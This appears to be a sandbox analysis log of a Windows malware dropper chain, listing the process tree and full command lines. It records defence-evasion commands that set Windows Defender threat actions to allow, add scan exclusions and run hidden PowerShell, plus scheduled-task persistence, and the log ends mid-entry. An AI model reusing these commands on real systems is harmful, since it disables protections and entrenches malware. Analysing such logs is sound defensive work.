C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 04:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe\" Wt /YOFdidzkZk 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\AGdHM7Hk4RUWQH3BLLGIuj6D.exe"C:\Users\Admin\Pictures\AGdHM7Hk4RUWQH3BLLGIuj6D.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Users\Admin\Pictures\BQWPihv4uKM5RNC27yFALEp0.exe"C:\Users\Admin\Pictures\BQWPihv4uKM5RNC27yFALEp0.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS57BB.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
- Image: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe (level 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1332 -ip 1332
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4432 -ip 4432
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4452 -ip 4452
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5172 -ip 5172
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3240 -ip 3240
- Image: C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
- Image: C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2296 -ip 2296
- Image: C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe (level 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe Wt /YOFdidzkZk 385118 /S
- Image: C:\Windows\SysWOW64\cmd.exe (level 2)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 5)
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Image: C:\Windows\SysWOW64\gpupdate.exe (level 6)
  Command line: "C:\Windows\system32\gpupdate.exe" /force
- Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
- Image: C:\Windows\SysWOW64\cmd.exe (level 3)
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 4)
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
